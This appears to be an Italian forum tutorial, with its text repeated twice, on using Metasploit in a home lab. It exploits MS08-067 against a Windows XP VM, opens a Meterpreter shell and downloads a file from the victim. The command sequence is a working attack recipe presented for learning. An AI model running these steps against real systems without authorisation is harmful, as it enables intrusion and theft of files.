Ultima modifica:
Questa guida è scritta con l'obiettivo di condividere le mie conoscenze in ambito pentesting.
Non pretendo di insegnare nulla a chi queste cose già le sa e magari ne trova anche semplici alcune, se non tutte.
Questo post, e i successivi che pubblicherò ogni volta che ho un pò di tempo, vogliono essere un modo per aprire delle discussioni, per poter scambiare idee e conoscenze sull'argomento, e magari potranno anche essere utili a chi è alle prime armi(parliamoci chiaro, TUTTI, chi più ,chi meno, siamo qui per imparare).
Bene dopo questa breve introduzione, iniziamo:
Occorrente:
- Virtual Box
- Macchina virtuale Kali Linux 2
- Macchina virtuale windows XP(antivirus e firewall disattivati, per questa volta )
- Entrambe le VM collegate in modalità di rete: scheda con bridge
Metasploit, per chi non ancora non lo sapesse, è un Framework scritto in Ruby che nasce come strumento di aiuto ai programmatori per il development di exploit. Ora, grazie ai numerosi sviluppatori che collaborano al progetto, è praticamente una suite di strumenti gigantesca, estremamente potente e flessibile, che permette di automatizzare molte procedure di exploiting(se non tutte) e si trova alla versione 4.
Link pagina ufficiale: https://www.metasploit.com/
Wikipedia: https://it.wikipedia.org/wiki/Metasploit_Project
Non mi soffermerò sull'installazione, sappiate comunque che su Kali Linux la si trova installata di default al path: /usr/share/metasploit-framework/
Ci sono molte interfacce di gestione con cui interagire con Metasploit: a riga di comando, da browser, da interfaccia grafica ( però mi sembra solo nella versione a pagamento ). Io mi soffermerò sull'interfaccia a riga di comando, che è l'unica che uso.
Per aprire metasploit, recarsi nella cartella di installazione di metasploit ed eseguire il comando
# ./msfconsole
Ricordatevi che dovrete attivare il servizio "postgresql" sulla kali, poichè metasploit ha anche un DB che funziona con PostGreSql, altrimenti metasploit funzionerà lo stesso, ma vi mostrerà un errore.
# systemctl start postgresql
Ok, una volta che il framework si è caricato vi mostrerà un banner, e una riga di comando così:
msf>
Diamo qualche comando:
msf> show
show permette di elencare tutte le risorse. Validi parametri sono: all,encoders,nops,exploits,payloads,auxiliary,plugins,info,options. Dare "show -h" per l'aiuto.
ogni commando di metasploit, prende come opzione -h che visualizza un help.
poi abbiamo il comando search per cercare l'exploit che ci interessa:
msf> search netapi
Diamo ora il comando "use" per selezionare l'exploit
msf> use exploit/windows/smb/ms08_067_netapi
Visualizziamo le opzioni dell'exploit con il comando
msf> show options
Vediamo che vengono mostrate le opzioni con il loro nome(maiuscolo), a fianco il valore che abbiamo settato, se è obbligatoria(yes o no) e una breve descrizione.
ora impostiamo il target fornendo l'ip della vittima(aprite il terminale windows e date ipconfig)
msf>set RHOST 192.168.1.240
e ora exploitiamo la macchina
msf> exploit
se tutto è andato correttamente, abbiamo aperto una shell meterpreter!
diamo qualche comando, inanzitutto vediamo quelli disponibili:
meterpreter> help
Diamo
meterpreter> sysinfo
per fare un po di information gathering...
meterpreter> getuid
per ottenere il nome utente con cui siamo loggati.
ora possiamo controllare tutti i file sul computer vittima, e ad esempio scaricarne uno:
meterpreter> download C:/Documents and Settings/dalvik/Desktop/segreto/segreto.txt
il file si troverà nella vostra directory di lavoro, data dal comando
meterpreter> getlwd
per mettere in background la sessione di meterpreter per poi poterla riprenderla in seguito, diamo:
meterpreter> background
per riaprirla
msf> sessions -i 1
Oggi abbiamo descritto lo sfruttamento di una vlnerabilità che ci permette di hackerare un Pc con windows XP che si trovi nella nostra rete LAN.
Ci sono tantissime cose da fare una volta aperta una shell di Meterpter, il limite ce lo da solo la nostra fantasia!
Per il momento è tutto, questa era solo un inizio, nei prossimi articoli parleremo di escalation di privilegi, rubare credenziali, bypassing di antivirus, e tanto tanto altro. Alla prossima!
Link exploit: https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
Link Bollettino di sicurezza Microsoft: https://technet.microsoft.com/en-us/library/security/ms08-067.aspx?f=255&MSPPError=-2147217396
P.S. So che la formattazione del testo non è un granchè ma sono le 3 di notte e ho sonno dalla prossima guida formatterò il testo in maniera migliore. Buonanotte ragazzi!
Non pretendo di insegnare nulla a chi queste cose già le sa e magari ne trova anche semplici alcune, se non tutte.
Questo post, e i successivi che pubblicherò ogni volta che ho un pò di tempo, vogliono essere un modo per aprire delle discussioni, per poter scambiare idee e conoscenze sull'argomento, e magari potranno anche essere utili a chi è alle prime armi(parliamoci chiaro, TUTTI, chi più ,chi meno, siamo qui per imparare).
Bene dopo questa breve introduzione, iniziamo:
Occorrente:
- Virtual Box
- Macchina virtuale Kali Linux 2
- Macchina virtuale windows XP(antivirus e firewall disattivati, per questa volta )
- Entrambe le VM collegate in modalità di rete: scheda con bridge
Metasploit, per chi non ancora non lo sapesse, è un Framework scritto in Ruby che nasce come strumento di aiuto ai programmatori per il development di exploit. Ora, grazie ai numerosi sviluppatori che collaborano al progetto, è praticamente una suite di strumenti gigantesca, estremamente potente e flessibile, che permette di automatizzare molte procedure di exploiting(se non tutte) e si trova alla versione 4.
Link pagina ufficiale: https://www.metasploit.com/
Wikipedia: https://it.wikipedia.org/wiki/Metasploit_Project
Non mi soffermerò sull'installazione, sappiate comunque che su Kali Linux la si trova installata di default al path: /usr/share/metasploit-framework/
Ci sono molte interfacce di gestione con cui interagire con Metasploit: a riga di comando, da browser, da interfaccia grafica ( però mi sembra solo nella versione a pagamento ). Io mi soffermerò sull'interfaccia a riga di comando, che è l'unica che uso.
Per aprire metasploit, recarsi nella cartella di installazione di metasploit ed eseguire il comando
# ./msfconsole
Ricordatevi che dovrete attivare il servizio "postgresql" sulla kali, poichè metasploit ha anche un DB che funziona con PostGreSql, altrimenti metasploit funzionerà lo stesso, ma vi mostrerà un errore.
# systemctl start postgresql
Ok, una volta che il framework si è caricato vi mostrerà un banner, e una riga di comando così:
msf>
Diamo qualche comando:
msf> show
show permette di elencare tutte le risorse. Validi parametri sono: all,encoders,nops,exploits,payloads,auxiliary,plugins,info,options. Dare "show -h" per l'aiuto.
ogni commando di metasploit, prende come opzione -h che visualizza un help.
poi abbiamo il comando search per cercare l'exploit che ci interessa:
msf> search netapi
Diamo ora il comando "use" per selezionare l'exploit
msf> use exploit/windows/smb/ms08_067_netapi
Visualizziamo le opzioni dell'exploit con il comando
msf> show options
Vediamo che vengono mostrate le opzioni con il loro nome(maiuscolo), a fianco il valore che abbiamo settato, se è obbligatoria(yes o no) e una breve descrizione.
ora impostiamo il target fornendo l'ip della vittima(aprite il terminale windows e date ipconfig)
msf>set RHOST 192.168.1.240
e ora exploitiamo la macchina
msf> exploit
se tutto è andato correttamente, abbiamo aperto una shell meterpreter!
diamo qualche comando, inanzitutto vediamo quelli disponibili:
meterpreter> help
Diamo
meterpreter> sysinfo
per fare un po di information gathering...
meterpreter> getuid
per ottenere il nome utente con cui siamo loggati.
ora possiamo controllare tutti i file sul computer vittima, e ad esempio scaricarne uno:
meterpreter> download C:/Documents and Settings/dalvik/Desktop/segreto/segreto.txt
il file si troverà nella vostra directory di lavoro, data dal comando
meterpreter> getlwd
per mettere in background la sessione di meterpreter per poi poterla riprenderla in seguito, diamo:
meterpreter> background
per riaprirla
msf> sessions -i 1
Oggi abbiamo descritto lo sfruttamento di una vlnerabilità che ci permette di hackerare un Pc con windows XP che si trovi nella nostra rete LAN.
Ci sono tantissime cose da fare una volta aperta una shell di Meterpter, il limite ce lo da solo la nostra fantasia!
Per il momento è tutto, questa era solo un inizio, nei prossimi articoli parleremo di escalation di privilegi, rubare credenziali, bypassing di antivirus, e tanto tanto altro. Alla prossima!
Link exploit: https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
Link Bollettino di sicurezza Microsoft: https://technet.microsoft.com/en-us/library/security/ms08-067.aspx?f=255&MSPPError=-2147217396
P.S. So che la formattazione del testo non è un granchè ma sono le 3 di notte e ho sonno dalla prossima guida formatterò il testo in maniera migliore. Buonanotte ragazzi!